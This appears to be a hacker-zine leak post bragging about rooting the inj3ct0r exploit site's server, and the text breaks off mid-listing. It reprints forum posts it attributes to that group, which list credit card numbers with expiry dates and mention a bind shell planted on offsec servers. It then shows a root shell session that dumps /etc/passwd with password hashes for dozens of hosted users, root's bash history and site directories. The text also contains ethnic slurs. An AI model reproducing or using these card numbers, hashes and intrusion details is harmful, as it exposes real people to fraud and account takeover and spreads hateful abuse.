Inj3ct0r.com +#``|`````||`````||``````|``/`/_\`\ +#``|`___`||`___`||``````|`/``/````\ +#```\_-_/``\_-_/`|`____`|/__/``````\ +#````````````````_\_--_/````\`````/ 2) Or you are not wrong address, then Fuck Off! +#```````````````/____```````````/ +#``````````````/`````\`````````/ +#``````````````\______\_______/ + +Attention. This ridiculous banner is *not* part of our zine. In fact +it is inj3ct0r's 404 page. We concluded that this banner perfectly +reflects their retardedness. Their knowledge about security is on the +same level as their ability to speak proper english. For those who +don't know: inj3ct0r is a clone of the old milw0rm project, +administered by some morons called "r0073r", "Sid3^effects" and "L0rd +CrusAd3r". They are not only an exploit-db, but also an arrogant +community of retarded turks and arabs which tell you how you to write +your stupid Perl SQL-Injection exploit. + +All their attention whoring about how they hacked Facebook was driving +us insane and all their moaning about how they have problems with the +law was just too ridiculous for us to let them continue existing. +Actually we did not find out what kind of law problems they actually +had. We did however discover how stupid these kids are and what crap +they are talking about in their private forum area's. Check it out: + +------------- +-0day 31337 privat Area +-10-24-2010, 05:08 PM Post by KnocKout: +- +-0-Day Credit Cards | Part 2(Only 31337 Prv.)- +- +-Hi My Brothers.. +- +-14367 4454-5454-5454-5445 1 232 12-2012 +-14375 5257-9555-0001-0933 1 082 03-2013 ADVANTAGE +-14376 5492-9495-5876-7382 1 280 01-2013 BONUS +-14391 5437-7122-6415-1343 1 334 07-2012 MAXЭMUM +-14392 5437-7122-6415-1343 1 334 07-2012 MAXЭMUM +-------------- +- +-0day 31337 privat Area +-10-17-2010, 04:36 PM Post by KnocKout: +- +-Default => Rapid,Hotfile,CC Requests.. +- +-hi my brothers, +-RapidShare, Hotfile Premium and Credit Card. Requests.. +- +-Please indicate your requests here, and I will send Pm.. +-------------- + +Not only they are sharing CC's, they also think of themselves as the +best hackerz on the planet. Here is how they talk about exploit-db and +offsec: + +------------- +-0day 31337 privat Area: +-07-19-2010, 10:05 PM Post by SeeMe: +- +-guys, a bind shell have been sent to offsec server and enforced the regarding ports to be open +- +-Port State Service Reason Product Version Extra info +-22 tcp open ssh syn-ack OpenSSH 5.4 protocol 2.0 +-80 tcp open http syn-ack Apache httpd 2.2.15 (Fedora) +-301 tcp filtered unknown no-response +-443 tcp open https syn-ack +-1072 tcp filtered unknown no-response +-1087 tcp filtered unknown no-response +-1100 tcp filtered unknown no-response +-1111 tcp filtered unknown no-response +-1117 tcp filtered unknown no-response +-1443 tcp filtered ies-lm no-response +-1718 tcp filtered unknown no-response +-1720 tcp filtered H.323/Q.931 no-response +-1900 tcp filtered upnp no-response +-2000 tcp filtered cisco-sccp no-response +-2041 tcp filtered interbase no-response +-2046 tcp filtered sdfunc no-response +-2382 tcp filtered ms-olap3 no-response +-3017 tcp filtered unknown no-response +-4129 tcp filtered unknown no-response +-4900 tcp filtered unknown no-response +-5060 tcp filtered sip admin-prohibited +-5555 tcp filtered freeciv no-response +-5560 tcp filtered isqlplus no-response +-6669 tcp filtered irc no-response +-8007 tcp filtered ajp12 no-response +-9102 tcp filtered jetdirect no-response +-10000 tcp open snet-sensor-mgmt syn-ack +-44443 tcp filtered coldfusion-auth no-response +- +-but I just can't connect back to it +- +-any idea! +------------- +- +-07-21-2010, 10:10 PM Post by SeeMe: +- +-This is a new technology for me how to gain credentials over HTTP TRACE and TRACK +-when it's enable on a webserver +- +-The TRACE/TRACK method was enabled on the server listed below: +- +-http://www.offensive-security.com:80/ +- +-[PHP]http://www.offensive-security.com/wp-content/themes/infocus/lib/scripts/prettyPhoto/js/jquery.prettyPhoto.js?ver=./2.9.2%20HTTP/1.1[/PHP] +- +- +-could gain view info from the link above +------------- +- +-07-30-2010, 12:26 AM Post by SeeMe: +- +-http://mobile.backtrack-linux.org/ +- +-exploited for good and not sure that will be able to back it up +- +-and I'm still heading for the main both sites, offsec.com and exploit-db +- +-After one month into the desert I'll be back infront of my computer on 15th of Agu +- +-and I'll prepare for a globel war +------------- + + +They are calling exploit-db "lamers-db" yet they don't see who the +real lamers are. Hardly surprising that the inj3ct0r team did not +manage their box themselves and instead gave their work to some fat +guy called "asker". But since he left his box rot with some half +updated shit, it was a child's play to tap in and root. + +$ uname -a +Linux wateam 2.6.26-2-686 #1 SMP Thu Sep 16 19:35:51 UTC 2010 i686 GNU/Linux + +$ id +uid=0(root) gid=0(root) groups=0(root) + +$ cd / + +$ ls -la +total 540 +drwxr-xr-x 22 root root 1024 Oct 3 22:04 . +drwxr-xr-x 22 root root 1024 Oct 3 22:04 .. +drwxr-xr-x 2 root root 3072 Oct 3 21:09 bin +drwxr-xr-x 4 root root 1024 Oct 3 21:10 boot +drwxr-xr-x 15 root root 3460 Oct 15 15:19 dev +drwxr-xr-x 68 root root 6144 Oct 20 17:44 etc +drwxr-x--x 37 root root 4096 Oct 20 17:45 home +drwxr-xr-x 2 root root 1024 Nov 3 2007 initrd +lrwxrwxrwx 1 root root 28 Jul 29 11:28 initrd.img -> boot/initrd.img-2.6.26-2-686 +lrwxrwxrwx 1 root root 28 Nov 24 2008 initrd.img.old -> boot/initrd.img-2.6.18-6-686 +drwxr-xr-x 12 root root 7168 Oct 3 21:09 lib +drwx------ 2 root root 12288 Nov 3 2007 lost+found +drwxr-xr-x 2 root root 1024 Nov 3 2007 media +drwxr-xr-x 2 root root 1024 Oct 28 2006 mnt +drwxr-xr-x 2 root root 1024 Nov 3 2007 opt +dr-xr-xr-x 154 root root 0 Oct 15 15:18 proc +drwxr-x--- 7 root root 1024 Oct 15 17:27 root +drwxr-xr-x 2 root root 6144 Oct 3 21:09 sbin +drwxr-xr-x 2 root root 1024 Sep 16 2008 selinux +drwxr-xr-x 2 root root 1024 Nov 3 2007 srv +drwxr-xr-x 11 root root 0 Oct 15 15:18 sys +drwxrwxrwt 7 root root 492544 Oct 24 19:03 tmp +drwxr-xr-x 12 root root 4096 Jul 29 11:22 usr +drwxr-xr-x 15 root root 4096 Oct 29 2009 var +lrwxrwxrwx 1 root root 25 Jul 29 11:28 vmlinuz -> boot/vmlinuz-2.6.26-2-686 +lrwxrwxrwx 1 root root 25 Nov 24 2008 vmlinuz.old -> boot/vmlinuz-2.6.18-6-686 + +$ cat /etc/passwd +root:1NMGwkEq76.BsjeYGuM106fIjuU.RS/:0:0:root:/root:/bin/bash +daemon:*:1:1:daemon:/usr/sbin:/bin/sh +bin:*:2:2:bin:/bin:/bin/sh +sys:*:3:3:sys:/dev:/bin/sh +sync:*:4:65534:sync:/bin:/bin/sync +games:*:5:60:games:/usr/games:/bin/sh +man:*:6:12:man:/var/cache/man:/bin/sh +lp:*:7:7:lp:/var/spool/lpd:/bin/sh +mail:*:8:8:mail:/var/mail:/bin/sh +news:*:9:9:news:/var/spool/news:/bin/sh +uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:*:13:13:proxy:/bin:/bin/sh +www-data:*:33:33:www-data:/var/www:/bin/sh +backup:*:34:34:backup:/var/backups:/bin/sh +list:*:38:38:Mailing List Manager:/var/list:/bin/sh +irc:*:39:39:ircd:/var/run/ircd:/bin/sh +gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:*:65534:65534:nobody:/nonexistent:/bin/sh +mysql:!:100:102:MySQL Server,,,:/var/lib/mysql:/bin/false +proftpd:!:101:65534::/var/run/proftpd:/bin/false +ftp:!:102:65534::/home/ftp:/bin/false +sshd:!:103:65534::/var/run/sshd:/usr/sbin/nologin +Debian-exim:!:104:104::/var/spool/exim4:/bin/false +krivopustov:1V5RSW94dbZ3zwhsovKB4V5hHgvLLF/:1002:1002:,,,:/home/krivopustov:/bin/bash +volosovets:1NMLjMXqhFedJgnjw0uBwdQ2jRFqbG0:1007:1007:,,,:/home/volosovets:/bin/bash +wapper:1c1iEEB/k591mvgQk8a5mbsZmPwY8Q1:1008:1008:,,,:/home/wapper:/bin/bash +jaguar:1NOCfawFB/TD6X9.hEmN9Mn0kg1G.s1:1011:1011:,,,:/home/jaguar:/bin/bash +postfix:!:105:106::/var/spool/postfix:/bin/false +popa3d:!:106:109::/var/lib/popa3d:/bin/false +asmer:1O2E8f0enwpuZw37FkNoe0MNSktFTd.:1012:1012:,,,:/home/asmer:/bin/bash +wateam:1cewmdLFokkbiLeLlHrL2NJnPdqpnR/:1013:1013:,,,:/home/wateam:/bin/bash +silentwarrior:1aDOI9IqA5BrDw1EBfH4Afm5TYRNe//:1014:1014:,,,:/home/silentwarrior:/bin/bash +snt-nmu:1NZO0tdC.reQ07bby/FttmOEZLF7ys1:1015:1015:,,,:/home/snt-nmu:/bin/bash +nmusic:1tXoV.I8o28zdaeu.Ukrde4hYikNtG0:1020:1020:,,,:/home/nmusic:/bin/bash +mydns:1C8cYgZB0p9rtxWwyXoiJiK4QUa.sJ/:1021:1021:,,,:/home/mydns:/bin/bash +conference-sidelnikov:1ghcMsPcI9j5ok3AbEf5qGI.h7Mq7O.:1016:1016:,,,:/home/conference-sidelnikov:/bin/bash +lena:153QNshcJB/5PK1r8L/60LAOJCwzik1:1000:1000:,,,:/home/lena:/bin/bash +vakulenko:1g6y9T9/TWWr1s.FTZKwuKj2qwbYxg1:1027:1027:,,,:/home/vakulenko:/bin/bash +xanavi:1V4L5wKgWog9Kl4lV0uwvG0/0TyHyq1:1001:1001:,,,:/home/xanavi:/bin/bash +lalizas:1dzDm0j2v0fE06VyK89b/Pfm6ePylC0:1003:1003:,,,:/home/lalizas:/bin/bash +r0otech0inj3ct0rr00t0ro0t3r:1Yu.4UMOxpFH639CL8260qyjYwKgbk1:1006:1034:,,,:/home/r0otech0inj3ct0rr00t0ro0t3r:/bin/bash +n3tw0rkTeRr0r15M:1u1DDFCJnGFd0M07E5kahW3t0N1yYD1:1010:1034:,,,:/home/n3tw0rkTeRr0r15M:/bin/bash +pma:1cDULb4Zqt4ksmqqFe9MIQSBLrz3lO.:1019:1019:,,,:/home/pma:/bin/bash +valiant:1QXeOzsOyaW8gT6JknX1Ssa.A3ef8g/:1024:1024:,,,:/home/valiant:/bin/bash +cherrybikes:11MJaagK8rJ6BQ9pxLdZjU.WhIGG4r0:1031:1031:,,,:/home/cherrybikes:/bin/bash +natasha:1NmwIlomO.Y00wBbg0eGE9dqOP4qis/:1032:1032:,,,:/home/natasha:/bin/bash +ntp:!:107:107::/home/ntp:/bin/false +chupik:1gpJL5HGbm7EeCor46OOs8L0y1L7mH1:1005:1033:,,,:/home/chupik:/bin/bash +sweethome:1x4j1/bzV8Vf5fHBfeSp3BgMUNojJf.:1004:1035:,,,:/home/sweethome:/bin/bash +sweethome-lena:1uZFdDmVbAHGDtbBEGs1jjYYtvVONN1:1009:1036:,,,:/home/sweethome-lena:/bin/bash +skyweb:1.wiXZLSKG4F6WGVdgKDIorjx77.ZD1:1028:1037:,,,:/home/skyweb:/bin/bash +yslivka:1RNlOuljj5wZ8hdD0kSDe2wPMREdBu1:1029:1038:,,,:/home/yslivka:/bin/bash +tmv-nmu:168k122DrZFKqjXrwYSjjdMSKzzVDy.:1030:1039:,,,:/home/tmv-nmu:/bin/bash +web-ghost:1wuuXL1mSrDxVErzeO0KuoZKu8mJBj1:1018:1018:,,,:/home/web-ghost:/bin/bash +tiler-andrey:1RGxMA/cQA090Sx/VTTctkkHFZEs7I1:1035:1041:,,,:/home/tiler-andrey:/bin/bash +sunsanych:1RaR9SD58m80b/DVZEHYg6Ik4SKYWJ.:1036:1042:,,,:/home/sunsanych:/bin/bash +ra5ta:1nkELVbaHtGqTJl29kSFbjlDs1Yy3U0:1037:1043:,,,:/home/ra5ta:/bin/bash +magicgarden:1.MBu1KaRXkR2bihB8ZXnqfHbqQ5bm0:1038:1044:,,,:/home/magicgarden:/bin/bash +hochumogu:1MwCkIsEmO0Xe/BV8PndFgE9sIMF/Q1:1025:1025:,,,:/home/hochumogu:/bin/bash +libuuid:!:108:110::/var/lib/libuuid:/bin/sh +steelnews:1ajGgNpodz1jrN1JlmcmLmms5Wf7kn0:1017:1017:,,,:/home/steelnews:/bin/bash +vonline:1sk1MRD8BW3jlEKEYUNCtJ3d0gY1bh0:1022:1045:,,,:/home/vonline:/bin/bash +dyquem:1JkATmEyg3XnBHIeGOEstzP2vmes4s1:1039:1046:,,,:/home/dyquem:/bin/bash +vika:1bkhqsMEjgj7H.DzRJLoGj64SksjzM1:1040:1047:,,,:/home/vika:/bin/bash +tiler-dima:1jKtO0mArwxlajKK9/v4yFHF1mu9/g0:1026:1040:,,,:/home/tiler-dima:/bin/bash +mazafaka:1LSjx2PhiI7OlLVcMSEz2GJDUiwBmg.:1034:1034:,,,:/home/mazafaka:/bin/bash +tiler:1Qa4oVdJmYjcu6Ccq/7AqTEA6V2GIT1:1023:1023:,,,:/home/tiler:/bin/bash + +$ cd /root + +$ ls -la +total 14 +drwxr-x--- 7 root root 1024 Oct 15 17:27 . +drwxr-xr-x 22 root root 1024 Oct 3 22:04 .. +drwx------ 2 root root 1024 Aug 20 02:09 .aptitude +-rw------- 1 root root 6748 Oct 22 22:28 .bash_history +drwxr-xr-x 2 root root 1024 Aug 20 02:09 .debtags +drwxr-xr-x 2 root root 1024 Oct 15 17:29 .mc +drwxr-xr-x 2 root root 1024 Aug 2 21:39 scripts +drwxr-xr-x 2 root root 1024 Oct 15 16:51 test + +$ cat .bash_history +apache2 -k restart +cd /home/maza*/h* +ls -al +nano index.html +ls -al +nano index.html +exit +a2ensite mazafaka.in +apache2 -k restart +edquota -g inj3ct0r +quotatool +quotatool -g inj3ct0r -bl 512M /home +edquota inj3ct0r +edquota -g inj3ct0r +exit +cd /home/n* +ls -al +cd ht* +ls -al +nano index.php +ls -al +cd t*dark +ls -al +cd gra* +ls -al +cd .. +du +cd .. +ls -al +du tech_dark +du tech_blue +du tech_white +ls -al +cd cpstyles +ls -al +du +du -h +cd . +cd.. + cd .. +du -h *dark +cd tech_dark +ls -al +cd misc +ls -al +cd .. +cd .. +find ./ -name *.tpl +find ./ -name *.htm +find ./ -name *.htm* +find ./ -name *.tpl +cd .. +cd ht* +cd gree* +ls -al +du -h +cd pools +cd pools +cd polls +ls -al +cd .. +cd regimage +ls -la +cd ../.. +nano index.php +ls -al +rm ya*.txt +rm google* +cd incl* +ls -al +cd .. +ls -al +cd green* +ls -al +cd editor +ls -al +cd .. +cd attach +ls -al +cd .. +cd .. +ls -al +find ./ -name *.css +cd cp* +ls -al +cd vB* +ls -al +cd .. +ls -al +du -h +cd .. +find ./ -name *.css +nano ./tech_white/tech_white.css +exit +cd /etc/ +nano crontab +exit +cd /var/ +ls -la +cd mail +ls -al +cd /etc/postfix +nano virtual +postmap virtual +nano aliases +defrag +ls -al +exit +cd /var/mail +ls -al +rm tiler-* +ls -la +exit +exit +passwd tiler +passwd tiler +exit +cd /etc/ +nano passwd +exit +passwd lena +exit +sasldbpasswd2 +saslpasswd2 +saslpasswd2 -c lena +sasllistusers2 +sasldblistusers2 +saslpasswd2 +saslpasswd2 -d sweethome-lena +exit +saslpasswd2 -c sweethome-lena +passwd sweethome-lena +exit +passwd tiler +exit +cd /home/snt* +ls -al +cd ht* +ls -al +nano index.php +exit +cd /home/sn*/h*/ +nano index.php +cd /home/wa*/h* +ls -al +nano index.php +cd /home/wateam +cd h* +nano index.html +exit +cd /home +ls -al +cd lena +ls -al +cd htdocs +ls -al +cd .. +cd .. +rm lena -R +cd mydns +ls -al +cd .. +rmdir mydns +cd temp +ls -al +du -h +rm * +cd .. +ls -al +cd lo* +ls -al +cd .. +rmdir lost+found +exit +cd /home/wateam +ls -al +cd other +ls -al +cd ../htdocs +nano index.html +exit +cd /home/n* +cd htdocs +ls -al +cd inc* +ls -al +nano config.php +exit +cd /etc/apache2 +nano apache2.conf +nano vhosts.conf + +nano apache2.conf +apache2 -k restart +nano apache2.conf +apache2 -k restart +cd /mo*e +cd mo*e +nano fcgi* +cd .. +nano vhosts +nano vhosts +cd /var/lib/log* +ls -al +cat status +cat status|more +nano status +rm status +logrotate +logrotate -f /etc/logrotate.conf +ls -al +nano status +ls -al +df -h +cd /var/log +ls -al +exit +cd /home/ +tar --help +tar +cls +tar --help|more +tar --help|more +tar --help|more +cd cd tiler +ls -al +cd tiler +ls -al +tar cvzf tiler.tar +ls -al +cd ht* +ls -al +tar cvzf tiler.tar +tar --help|more +man tar +ls -akl +ls -al +cd .. +tar -zcvf tiler.tar htdocs +ls -la +nano /etc/passwd +init 6 +exit +ren +rename +mkdir test +cd test +touch 1d_5.jpg +touch 1d_7.JPG +touch 1.jpg +touch 1d7.JPg +ls -al +rename +rename --help +man rename +rename -n (.*)\.JPG 1.jpg +rename -n '/.*\.JPG/' *.jpg +rename -n /.*\.JPG/ *.jpg +rename -n /.*\.JPG/ * +rename -nv /.*\.JPG/ * +ls -al +rename -nv s/.*\.JPG/ * +rename -nv /.*\.JPG/ * +rename -nv /.*\.JPG/ *.JPG +rename -nv /.*\.JPG/ *.JPG +rename -nv '/.*\.JPG/' *.JPG +rename -nv '/.+\.JPG/' *.JPG +rename -nv '/.+\.JPG/' *.JPG +rename -nv . * +rename -nv /./ * +rename -nv /./ *.JPG +rename -n 'y/A-Z/a-z/' * +rename -n '/A-Z/a-z/' * +rename -n /\.JPG/ * +rename -n /\.JPG/ *.JPG +rename -n '\.JPG' *.JPG +rename -n 's/\.JPG/' *.JPG +rename -n 's/\.JPG//' *.JPG +rename -n 's/\.JPG//' *.JPG +rename -n '/\.JPG//' *.JPG +rename -n '/\.JPG//' *.JPG +rename -n '/\.JPG/' *.JPG +rename -n 's/\.JPG//' *.JPG +ls -al +mv 1.jpg ONE.JPG +ls -la +rename -n 's/\.JPG//' *.JPG +rename -n 's/\.JPG//' ** +rename -n 's/\.JPG//' *.* +rename -n 's/\.JPG//' +rename -n 's/\.JPG//' *.JPG +rename -n 's/\.JPG//' *E.JPG +rename -n 's/\.JPG//' *. +man rename +rename -nv s\.jpg// *.JPG +rename -nv s\./jpg// *.JPG +rename -nv s\./jpg// *.JPG +man rename +rename -nv .JPG .jpg * +rename -nv /.JPG .jpg/ * +rename -nv /\.JPG \.jpg/ * +rename -nv /\.JPG \.jpg/ *rename .bak .txt *.bak +rename .bak .txt *.bak +rename -nv s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\./ * +rename -nv s/\.JPG/\.jpg/ * +cd /home/ +cd tiler +cd ht* +cd up* +cd ima* +ls -al +rename s/\.JPG/\.jpg/ * +ls -al +ls -al +rename s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\.jpg/ * +rename -nv s/\.JPG/\.jpg/ *|more +rename -nv s/\.JPG/\.jpg/ *|more +mc +cd .. +cd .. +cd .. +ls -al +tar zcvf tiler.tar.gz htdocs +cd ht* +rmdir uploaded -R +rm uploaded -R +exit +cd /home/r0*' +cd /home/r0* +cd h* +nano index.php +cd ../../snt* +cd ht* +nano index.php +cd ../../n* +cd ht* +ls -al +nano index.php +ls -al +find / - name *.tpl +find ./ -name *.tpl +find ./ -name template +find ./ -name tp +find ./ -name tem +find ./ -name them +ls -al +grep --help +grep -rl "sweethome" ./ +grep -rl "tiler" ./ +cd ../../ +ls -al +cd sweethome +ls -al +cd htdocs +ls -al +nano tem* +cd tem* +cd blocks +ls -al +nano left.php +nano left.php +cd /home/tiler/ht* +ls -al +cd .././ +cd ../ +ls -al +cd sn* +cd ht* +nano index.php +cd ../../ +cd r0*/h* +nano index.php +cd ../../wa* +cd ../wateam +cd ht* +nani index.html +nani index.htm +nani index.php +ls -al +nano index.html +exit +/etc/init.d/ssh_brute stop +/etc/init.d/ssh_brute start +cd /var/log/pro* +ls -al +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log +tail -n 100 proftpd.log|grep 18 +tail -n 100 proftpd.log|grep 18 +tail -n 100 proftpd.log|grep 18 +tail -n 100 proftpd.log|grep 18 +exit +cd /home/tiler +ls -al +tar zcvf 18.10.2010.tar.gz htdocs +ls -al +exit +cd /var/log +cd mail +ls -al +cat mail.log|grep stempher +cat mail.log|grep "Oct 19 12" +cat mail.log|grep "Oct 19 12"|more +exit +adduser sbs +adduser sbs +deluser sbs +adduser sbs +cd /home/sbs +cd /etc/apache2 +ls -al +cd si*e +ls -al +cp yslivka.org.ua sbs-ua.com +nano sbs-ua.com +a2ensite sbs-ua.com +cd /etc +exit +apache2 -k restart +exit +cd /etc/apache2 +cd si*e +ls -al +nano asmerok.org.ua +apache2 -k restart +adduser www-data sbs +adduser www-data sbs +apache2 -k restart +exit +cd /etc/ssh* +ls -al +cd sshd* +nano sshd* +exit +/etc/init.d/ssh restart +exit +cd /etc/apache2 +cd si*e +nano sbs-ua.com +apache2 -k restart +exit +unrar +urar +apt-get install unrar +apt-get clean +apt-get update +apt-get install unrar +apt-get install urar +apt-get install unrar-free +unrar +unrar --help +unrar --usage +apt-get upgrade +apt-get clean +exit +deluser sbs +cd /home +rm sbs -R +a2dissite sbs-ua.com +cd /etc/apache2 +cd si*e +rm sbs-ua.com +apache2 -k restart +ls -al +exit +cd /home +ls -la +exit +cd /etc/apache2 +cd si*e +cp chupik.org.ua vdnh.org.ua +cp chupik.org.ua vdnh.org.ua +ls -al +cd .. +nano vhosts +cd si*e +ls -al +nano chupik.org.ua +nano vdnh.org.ua +a2ensite chupik.org.ua +a2ensite vdnh.org.ua +apache2 -k restart +exit + +cd scripts +ls -la +total 4 +drwxr-xr-x 2 root root 1024 Aug 2 21:39 . +drwxr-x--- 7 root root 1024 Oct 15 17:27 .. +-rwx------ 1 root root 76 Feb 1 2010 clear_cband.sh +-rwx------ 1 root root 220 May 31 00:59 uaix_block.sh +cat * +#!/bin/sh + +apache2 -k stop +sleep 5 +rm /etc/apache2/cband/* +apache2 -k start +#!/bin/sh + +rm prefixes.txt +rm /etc/apache2/cband-ua.conf +wget -q http://www.colocall.net/uaix/prefixes.txt + +for i in `cat prefixes.txt` +do + echo "CBandClassDst i" >> /etc/apache2/cband-ua.conf +done + +apache2ctl graceful + +$ cd .. + +$ cd test + +$ ls -la +total 2 +drwxr-xr-x 2 root root 1024 Oct 15 16:51 . +drwxr-x--- 7 root root 1024 Oct 15 17:27 .. +-rw-r--r-- 1 root root 0 Oct 15 16:34 1d7.JPg +-rw-r--r-- 1 root root 0 Oct 15 16:33 1d_5.jpg +-rw-r--r-- 1 root root 0 Oct 15 16:33 1d_7.JPG +-rw-r--r-- 1 root root 0 Oct 15 16:33 ONE.JPG + +$ cd /home + +$ ls -la +total 169 +drwxr-x--x 37 root root 4096 Oct 20 17:45 . +drwxr-xr-x 22 root root 1024 Oct 3 22:04 .. +-rw------- 1 root root 9216 Oct 22 17:45 aquota.group +-rw------- 1 root root 9216 Oct 22 17:45 aquota.user +drwxr-x--- 7 asmer asmer 4096 Oct 22 18:58 asmer +drwxr-x--- 6 cherrybikes cherrybikes 4096 Oct 24 18:56 cherrybikes +drwxr-x--- 4 chupik chupik 4096 Dec 14 2009 chupik +drwxr-x--- 4 conference-sidelnikov conference-sidelnikov 4096 Jan 7 2010 conference-sidelnikov +drwxr-x--- 4 dyquem dyquem 4096 Sep 6 17:20 dyquem +drwxr-x--- 4 hochumogu hochumogu 4096 Jul 16 16:51 hochumogu +drwxr-x--- 13 jaguar jaguar 4096 Oct 24 10:49 jaguar +drwxr-x--- 4 krivopustov krivopustov 4096 Nov 6 2007 krivopustov +drwxr-x--- 3 lalizas lalizas 4096 Feb 18 2009 lalizas +drwxr-x--- 4 magicgarden magicgarden 4096 Jul 12 23:32 magicgarden +drwxr-x--- 4 mazafaka inj3ct0r 4096 Oct 3 20:33 mazafaka +drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 n3tw0rkTeRr0r15M +drwxr-x--- 4 natasha natasha 4096 Oct 19 2009 natasha +drwxr-x--- 4 nmusic nmusic 4096 Mar 2 2009 nmusic +drwxr-x--- 4 pma pma 4096 May 13 16:28 pma +drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 r0otech0inj3ct0rr00t0ro0t3r +drwxr-x--- 4 ra5ta ra5ta 4096 Jul 12 18:25 ra5ta +drwxr-x--- 4 silentwarrior silentwarrior 4096 Oct 4 2009 silentwarrior +drwxr-x--- 4 skyweb skyweb 4096 Apr 16 2010 skyweb +drwxr-x--- 4 snt-nmu snt-nmu 4096 Feb 27 2009 snt-nmu +drwxr-x--- 4 steelnews steelnews 4096 Sep 4 15:20 steelnews +drwxr-x--- 4 sunsanych sunsanych 4096 Jun 13 14:07 sunsanych +drwxr-x--- 4 sweethome sweethome 4096 Aug 16 01:21 sweethome +drwxrwxrwx 2 root root 4096 Oct 24 16:12 temp +drwxr-x--- 4 tiler tiler 4096 Oct 20 22:37 tiler +drwxr-x--- 4 tmv-nmu tmv-nmu 4096 May 6 08:49 tmv-nmu +drwxr-x--- 4 vakulenko vakulenko 4096 Feb 27 2009 vakulenko +drwxr-x--- 4 vika vika 4096 Sep 8 19:15 vika +drwxr-x--- 4 volosovets volosovets 4096 Nov 6 2007 volosovets +drwxr-x--- 4 vonline vonline 4096 Sep 5 22:13 vonline +drwxr-x--- 5 wapper wapper 4096 Jun 13 2009 wapper +drwxr-x--- 4 wateam wateam 4096 Dec 27 2009 wateam +drwxr-x--- 4 web-ghost web-ghost 4096 Jun 7 10:05 web-ghost +drwxr-x--- 4 xanavi xanavi 4096 Jun 9 2009 xanavi +drwxr-x--- 4 yslivka yslivka 4096 Apr 23 2010 yslivka + +$ cd r0otech0inj3ct0rr00t0ro0t3r + +$ ls -la +total 8048 +drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 . +drwxr-x--x 37 root root 4096 Oct 20 17:45 .. +drwxr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Jan 22 2010 cgi-bin +-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 8210510 Oct 24 19:29 error.log +dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 24 19:27 htdocs + +$ cd htdocs + +$ ls -la +total 184 +dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 5 19:21 . +drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 .. +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1821 Oct 5 19:19 .htaccess +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 85 Oct 1 14:17 BingSiteAuth.xml +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4047 Oct 1 14:17 author.php +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 banner +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 19 13:20 banner_black +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1445 Oct 1 14:17 browser.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2308 Oct 1 14:17 category.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 604 Oct 1 14:17 config.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 date.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 562 Oct 1 14:17 db.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2090 Oct 1 14:17 exploit.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1406 Oct 1 14:17 favicon.ico +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 28 14:15 files +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 53 Oct 1 14:17 googlee6e0c515ab2abd97.html +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 83 Oct 1 14:17 hacker.php +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 19 02:37 images +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1745 Oct 16 12:34 index.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2672 Oct 8 13:19 inj3ct0r.css +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 9293 Oct 5 19:15 lib.php +dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 pages +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1008 Oct 1 14:17 pages.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2873 Oct 1 14:17 platform.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1894 Oct 1 14:17 related.php +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 131 Oct 1 14:17 robots.txt +-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 rss.php +-rw-r--r-- 1 